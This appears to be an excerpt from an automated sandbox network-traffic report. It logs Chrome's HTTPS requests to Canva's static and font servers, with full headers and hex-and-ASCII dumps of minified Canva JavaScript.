                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 70 65 29 2c 74 68 69 73 2e 50 71 2e 51 70 3f 74 68 69 73 2e 50 71 2e 51 70 2e 76 61 6c 75 65 5b 30 5d 3a 76 6f 69 64 20 30 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 4d 7a 62 2e 42 28 74 68 69 73 29 3b 74 68 69 73 2e 50 71 3d 61 3b 74 68 69 73 2e 74 79 70 65 3d 22 6d 65 6e 74 69 6f 6e 22 7d 7d 3b 76 61 72 20 45 41 62 3d 63 6c 61 73 73 7b 58 33 28 61 29 7b 74 68 69 73 2e 50 30 2e 58 33 28 61 29 7d 4f 50 28 61 2c 62 29 7b 74 68 69 73 2e 50 30 2e 4f 50 28 61 2c 62 29 7d 51 4d 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 50 30 2e 51 4d 28 61 29 7d 56 33 28 61 29 7b 74 68 69 73 2e 6b 67 61 2e 56 33 28 61 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 50 30 3d 61 3b 74 68 69 73 2e 6b 67 61 3d 62 3b 74 68 69 73 2e 73 48 3d
                                                                                                                                                                                                                                                    Data Ascii: pe),this.Pq.Qp?this.Pq.Qp.value[0]:void 0}constructor(a){Mzb.B(this);this.Pq=a;this.type="mention"}};var EAb=class{X3(a){this.P0.X3(a)}OP(a,b){this.P0.OP(a,b)}QM(a){return this.P0.QM(a)}V3(a){this.kga.V3(a)}constructor(a,b,c){this.P0=a;this.kga=b;this.sH=
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 22 2c 63 6c 69 70 50 61 74 68 3a 60 75 72 6c 28 23 24 7b 6e 7d 29 60 2c 73 74 72 6f 6b 65 3a 63 2c 63 6c 61 73 73 4e 61 6d 65 3a 59 36 28 22 63 55 46 46 52 41 22 2c 7b 5f 32 4c 56 50 5f 67 3a 63 7d 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 6c 29 3b 7d 72 65 74 75 72 6e 20 58 36 28 22 73 70 61 6e 22 2c 7b 72 6f 6c 65 3a 66 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 67 2c 63 6c 61 73 73 4e 61 6d 65 3a 59 36 28 22 56 61 57 38 5f 41 22 2c 7b 63 55 46 46 52 41 3a 22 73 71 75 61 72 65 22 3d 3d 3d 6c 7d 29 2c 2e 2e 2e 6d 2c 63 68 69 6c 64 72 65 6e 3a 61 37 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 68 2c 73 74 79 6c 65 3a 6b 2c 63 68 69 6c 64 72 65 6e 3a 5b 70 2c 0a 6e 2c 58 36 28 22 74 65 78 74 22 2c 7b
                                                                                                                                                                                                                                                    Data Ascii: ",clipPath:`url(#${n})`,stroke:c,className:Y6("cUFFRA",{_2LVP_g:c})});break;default:throw new B(l);}return X6("span",{role:f,"aria-label":g,className:Y6("VaW8_A",{cUFFRA:"square"===l}),...m,children:a7("svg",{className:h,style:k,children:[p,n,X6("text",{
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 69 74 44 6f 6e 65 3a 22 67 75 6d 34 30 51 22 7d 2c 4c 41 62 3d 64 37 28 66 75 6e 63 74 69 6f 6e 28 7b 49 54 3a 61 3d 21 31 2c 63 68 69 6c 64 72 65 6e 3a 62 2c 6b 65 79 46 72 61 6d 65 3a 63 2c 6d 70 61 3a 64 2c 54 65 61 3a 65 3d 22 68 69 64 64 65 6e 22 2c 67 67 61 3a 66 3d 22 68 69 64 64 65 6e 22 2c 61 72 69 61 4c 69 76 65 3a 67 2c 49 6a 61 3a 68 2c 6b 59 61 3a 6b 3d 22 6e 6f 6e 65 22 7d 29 7b 61 3d 5f 5f 63 2e 6e 62 28 29 26 26 21 61 3b 72 65 74 75 72 6e 20 65 41 62 28 7b 63 68 69 6c 64 72 65 6e 3a 62 2c 6b 65 79 46 72 61 6d 65 3a 63 2c 6d 70 61 3a 64 2c 61 72 69 61 4c 69 76 65 3a 67 2c 54 65 61 3a 65 2c 67 67 61 3a 66 2c 49 6a 61 3a 68 2c 56 74 61 3a 61 3f 4a 41 62 3a 30 2c 79 79 61 3a 59 36 28 7b 5f 34 43 31 76 49 41 3a 61 2c 70 4f 6c 6c 36 51 3a 22 6e
                                                                                                                                                                                                                                                    Data Ascii: itDone:"gum40Q"},LAb=d7(function({IT:a=!1,children:b,keyFrame:c,mpa:d,Tea:e="hidden",gga:f="hidden",ariaLive:g,Ija:h,kYa:k="none"}){a=__c.nb()&&!a;return eAb({children:b,keyFrame:c,mpa:d,ariaLive:g,Tea:e,gga:f,Ija:h,Vta:a?JAb:0,yya:Y6({_4C1vIA:a,pOll6Q:"n


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    40192.168.2.449785104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC615OUTGET /web/18db09b659c42845.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 44810
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a250fed4307-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71060
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "99252e478b7202700b285066ee7024cc"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:17 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:32 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: MqGoa9gJq9pyNkmQYp57DYMcvnKh3L/zaj2oYfOqppm29g0n/6V1NbXqQ9a+2bc9uabuqNq5xs8=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYNK9W2SJEZH9B1
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: p1TgceUJi23ENT9DImHjiwqr_AS8lRmR
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 38 49 34 77 4c 6b 79 65 54 76 42 70 61 49 41 50 70 69 6f 7a 76 6d 67 25 32 42 38 65 46 75 69 56 56 68 66 4c 6f 6c 68 58 32 66 49 70 56 25 32 42 69 6b 63 4e 69 56 58 57 25 32 46 72 57 63 64 47 79 48 6a 45 6a 63 75 31 50 79 32 53 64 45 4e 55 38 30 25 32 46 65 51 39 69 34 43 6c 69 47 61 62 63 4e 49 50 47 30 25 32 42 43 70 66 65 50 52 36 39 50 4d 62 56 61 59 6f 66 4e 68 73 6e 4e 32 31 52 34 78 65 41 4d 35 5a 6e 66 25 32 46 64 30 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8I4wLkyeTvBpaIAPpiozvmg%2B8eFuiVVhfLolhX2fIpV%2BikcNiVXW%2FrWcdGyHjEjcu1Py2SdENU80%2FeQ9i4CliGabcNIPG0%2BCpfePR69PMbVaYofNhsnN21R4xeAM5Znf%2Fd0%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1192INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 34 32 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 33 38 34 30 36 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66 65
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1425],{/***/ 38406:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 74 3b 61 3d 61 2e 63 6f 6e 74 65 78 74 3b 5f 5f 63 2e 78 28 22 66 6f 72 6d 75 6c 61 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 62 3d 64 2e 54 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 74 79 70 65 29 29 3b 62 3d 64 2e 54 65 2e 76 61 6c 75 65 3b 73 77 69 74 63 68 28 62 2e 74 79 70 65 29 7b 63 61 73 65 20 22 69 6e 76 61 6c 69 64 22 3a 62 3d 62 2e 6d 58 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 62 3d 62 2e 4c 43 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 62 29 3b 7d 5f 5f 63 2e 78 28 62 2e 73 74 61 72 74 73 57 69 74 68 28 22 3d 22 29 29 3b 63 6f 6e 73 74 20 65 3d 64 2e 51 70 3b 62 3d
                                                                                                                                                                                                                                                    Data Ascii: t;a=a.context;__c.x("formula"===(null===d||void 0===d?void 0:null===(b=d.Te)||void 0===b?void 0:b.type));b=d.Te.value;switch(b.type){case "invalid":b=b.mX;break;case "canonical":b=b.LC;break;default:throw new B(b);}__c.x(b.startsWith("="));const e=d.Qp;b=
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 74 79 6c 65 3a 7b 77 69 64 74 68 3a 62 2c 68 65 69 67 68 74 3a 63 2c 74 72 61 6e 73 66 6f 72 6d 3a 60 73 63 61 6c 65 28 24 7b 64 7d 29 60 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 62 78 37 34 75 51 22 2c 63 68 69 6c 64 72 65 6e 3a 6a 37 28 5f 5f 63 2e 73 76 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6c 37 28 7b 79 69 6d 6c 31 67 3a 65 2c 6f 59 6c 68 58 41 3a 66 7d 29 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 61 6c 69 67 6e 6d 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 61 7d 29 7d 29 7d 2c 6b 42 62 3d 66 75 6e 63 74 69 6f 6e 28 7b 77 69 3a 61 2c 68 69 67 68 6c 69 67 68 74 3a 62 2c 73 63 61 6c 65 3a 63 2c 6a 6f 3a 64 2c 77 6b 3a 65 2c 70 72 61 3a 66 7d 29 7b 63 6f 6e 73 74 20 67 3d 6d 37 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6d 3d 6e 75 6c 6c 3d
                                                                                                                                                                                                                                                    Data Ascii: tyle:{width:b,height:c,transform:`scale(${d})`},className:"bx74uQ",children:j7(__c.sv,{className:l7({yiml1g:e,oYlhXA:f}),size:"small",alignment:"center",children:a})})},kBb=function({wi:a,highlight:b,scale:c,jo:d,wk:e,pra:f}){const g=m7(()=>{const m=null=
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 68 5d 29 2c 6c 3d 6f 37 28 6e 3d 3e 6e 75 6c 6c 21 3d 66 2e 73 65 6c 65 63 74 69 6f 6e 26 26 61 2e 6c 6f 61 28 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 5b 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 2c 6d 3d 6f 37 28 6e 3d 3e 6e 75 6c 6c 21 3d 66 2e 73 65 6c 65 63 74 69 6f 6e 26 26 61 2e 71 43 61 28 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 0a 5b 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 3b 72 65 74 75 72 6e 20 6a 37 28 71 37 2c 7b 2e 2e 2e 66 2c 73 63 61 6c 65 3a 67 2c 77 6b 3a 6b 2c 53 6f 61 3a 6d 2c 74 6a 61 3a 6c 2c 77 78 3a 62 7d 29 7d 29 3b 72 65 74 75 72 6e 7b 4f 72 61 3a 63 2c 4e 72 61 3a 64 2c 50 72 61 3a 65 7d 7d 2c 6e 42 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f
                                                                                                                                                                                                                                                    Data Ascii: h]),l=o7(n=>null!=f.selection&&a.loa(f.selection).has(n),[f.selection]),m=o7(n=>null!=f.selection&&a.qCa(f.sheet,f.selection).has(n),[f.sheet,f.selection]);return j7(q7,{...f,scale:g,wk:k,Soa:m,tja:l,wx:b})});return{Ora:c,Nra:d,Pra:e}},nBb=function(a){co
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 6e 20 6a 37 28 75 42 62 2c 7b 2e 2e 2e 74 68 69 73 2e 70 72 6f 70 73 2c 73 63 61 6c 65 46 61 63 74 6f 72 3a 74 68 69 73 2e 73 63 61 6c 65 46 61 63 74 6f 72 2c 4a 6e 3a 62 2c 6e 43 3a 74 68 69 73 2e 6e 43 2c 70 67 3a 74 68 69 73 2e 70 67 2c 4a 6f 61 3a 64 2c 65 76 3a 66 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 2e 2e 2e 6b 29 7b 73 75 70 65 72 28 2e 2e 2e 6b 29 3b 74 68 69 73 2e 73 63 61 6c 65 46 61 63 74 6f 72 3d 74 37 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6c 3d 74 68 69 73 2e 70 72 6f 70 73 2e 69 74 65 6d 3b 76 61 72 20 6d 3d 74 68 69 73 2e 70 72 6f 70 73 2e 69 62 2c 6e 3d 6d 2e 4e 7a 3b 6d 3d 6d 2e 7a 6f 6f 6d 3b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 22 73 63 72 65 65 6e 22 3a 72 65 74 75 72 6e 20 31 3b 63 61 73 65 20 22 70 72 69 6e 74 22 3a 6e
                                                                                                                                                                                                                                                    Data Ascii: n j7(uBb,{...this.props,scaleFactor:this.scaleFactor,Jn:b,nC:this.nC,pg:this.pg,Joa:d,ev:f})}constructor(...k){super(...k);this.scaleFactor=t7(()=>{const l=this.props.item;var m=this.props.ib,n=m.Nz;m=m.zoom;switch(n){case "screen":return 1;case "print":n
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 28 74 2b 70 2a 7a 2c 75 29 2c 2e 2e 2e 5f 5f 63 2e 78 4a 28 28 74 2d 71 29 2a 7a 2c 6e 2a 79 2c 44 29 7d 7d 7d 29 2e 66 69 6c 74 65 72 28 5f 5f 63 2e 6f 62 29 3b 72 65 74 75 72 6e 5b 2e 2e 2e 66 2e 6d 61 70 28 6e 3d 3e 7b 76 61 72 20 70 2c 71 2c 72 3d 6e 2e 42 65 61 2c 74 3d 6e 2e 59 4b 61 2c 75 3d 6e 2e 4c 33 3b 63 6f 6e 73 74 20 77 3d 6e 2e 63 6f 6c 6f 72 2c 79 3d 6e 2e 77 65 69 67 68 74 3b 6e 3d 6e 2e 7a 62 3b 63 6f 6e 73 74 20 7a 3d 6e 75 6c 6c 3d 3d 3d 28 70 3d 68 2e 67 65 74 28 75 37 28 72 2c 74 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 70 3f 76 6f 69 64 20 30 3a 70 2e 44 61 3b 70 3d 6e 75 6c 6c 3d 3d 3d 28 71 3d 68 2e 67 65 74 28 75 37 28 72 2c 75 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 71 3f 76 6f 69 64 20 30 3a 71 2e 6f 61 3b 69 66 28 6e 75 6c
                                                                                                                                                                                                                                                    Data Ascii: (t+p*z,u),...__c.xJ((t-q)*z,n*y,D)}}}).filter(__c.ob);return[...f.map(n=>{var p,q,r=n.Bea,t=n.YKa,u=n.L3;const w=n.color,y=n.weight;n=n.zb;const z=null===(p=h.get(u7(r,t)))||void 0===p?void 0:p.Da;p=null===(q=h.get(u7(r,u)))||void 0===q?void 0:q.oa;if(nul
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 6e 73 74 20 6c 20 6f 66 20 64 29 7b 63 3d 6b 2e 62 61 3b 76 61 72 20 66 3d 6c 2e 63 6f 6c 75 6d 6e 2c 67 3d 61 2e 6c 61 79 6f 75 74 2e 63 65 6c 6c 73 2e 67 65 74 28 63 2c 66 29 3b 69 66 28 21 67 7c 7c 28 22 73 74 61 72 74 22 3d 3d 3d 6b 2e 62 6f 75 6e 64 61 72 79 3f 67 2e 73 70 61 6e 2e 4d 62 3d 3d 3d 0a 63 3a 67 2e 73 70 61 6e 2e 42 63 3d 3d 3d 63 29 29 69 66 28 63 3d 62 2e 67 65 74 28 60 24 7b 66 2e 69 64 7d 3a 24 7b 63 2e 69 64 7d 60 29 2c 63 3d 22 73 74 61 72 74 22 3d 3d 3d 6b 2e 62 6f 75 6e 64 61 72 79 3f 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 6f 61 3a 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 44 61 29 7b 67 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3b
                                                                                                                                                                                                                                                    Data Ascii: nst l of d){c=k.ba;var f=l.column,g=a.layout.cells.get(c,f);if(!g||("start"===k.boundary?g.span.Mb===c:g.span.Bc===c))if(c=b.get(`${f.id}:${c.id}`),c="start"===k.boundary?null===c||void 0===c?void 0:c.oa:null===c||void 0===c?void 0:c.Da){g=e[e.length-1];
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 74 20 66 3d 61 2e 49 6f 61 2e 4b 77 61 28 63 2c 62 2e 6c 61 79 6f 75 74 2e 72 6f 77 73 2e 6c 61 73 74 28 29 2c 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 6c 61 73 74 28 29 29 3b 61 3d 28 71 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 66 2e 67 65 74 28 71 29 7c 7c 30 2c 75 3d 66 2e 67 65 74 28 72 29 7c 7c 30 3b 72 65 74 75 72 6e 20 74 3c 3d 75 3f 71 3a 72 7d 3b 63 6f 6e 73 74 20 67 3d 6e 65 77 20 4d 61 70 3b 69 66 28 30 3d 3d 3d 64 2e 6c 65 6e 67 74 68 7c 7c 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 67 3b 76 61 72 20 68 3d 5b 5d 2c 6b 3d 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 50 65 28 65 5b 30 5d 2e 63 6f 6c 75 6d 6e 29 3b 6b 26 26 68 2e 70 75 73 68 28 7b 63 6f 6c 75 6d 6e 3a 6b 2c 62 6f 75 6e 64 61 72 79 3a 22 73 74 61 72 74 22 7d 29 3b
                                                                                                                                                                                                                                                    Data Ascii: t f=a.Ioa.Kwa(c,b.layout.rows.last(),b.layout.cols.last());a=(q,r)=>{const t=f.get(q)||0,u=f.get(r)||0;return t<=u?q:r};const g=new Map;if(0===d.length||0===e.length)return g;var h=[],k=b.layout.cols.Pe(e[0].column);k&&h.push({column:k,boundary:"start"});
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 3d 76 6f 69 64 20 30 7d 63 6f 6e 73 74 20 7b 68 65 69 67 68 74 3a 75 2c 77 69 64 74 68 3a 77 7d 3d 31 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 7a 62 29 3f 7b 68 65 69 67 68 74 3a 74 2e 77 65 69 67 68 74 2c 77 69 64 74 68 3a 74 2e 77 65 69 67 68 74 7d 3a 7b 68 65 69 67 68 74 3a 4d 61 74 68 2e 6d 61 78 28 28 6e 75 6c 6c 3d 3d 3d 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 77 65 69 67 68 74 29 7c 7c 30 2c 28 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 2e 77 65 69 67 68 74 29 7c 7c 30 29 2c 77 69 64 74 68 3a 4d 61 74 68 2e 6d 61 78 28 28 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 77 65
                                                                                                                                                                                                                                                    Data Ascii: =void 0}const {height:u,width:w}=1===(null===t||void 0===t?void 0:t.zb)?{height:t.weight,width:t.weight}:{height:Math.max((null===l||void 0===l?void 0:l.weight)||0,(null===m||void 0===m?void 0:m.weight)||0),width:Math.max((null===n||void 0===n?void 0:n.we


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    41192.168.2.449787104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC636OUTGET /YAFdJjTk5UU/0/CanvaSans-BoldItalic12646845404018590449.625cf32ea46ae48b58ebd3ff993de469.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 42876
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a273f1343f7-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1503220
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "8f4bec1ddf700ed07257978d5663a76d"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:31 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 14 Mar 2023 06:04:12 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: azC2R+D0cr2F9n6h3yz8/7tfZ/O19FMHGK5rJdhFbLw1AQgwslvcTMbdqWAaqnGFQt8FWUuIhd8=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: E8J2R079F7SQWH2K
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: lj_1OvalhrYVG2ryDANEaAUMnL4TNQTt
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
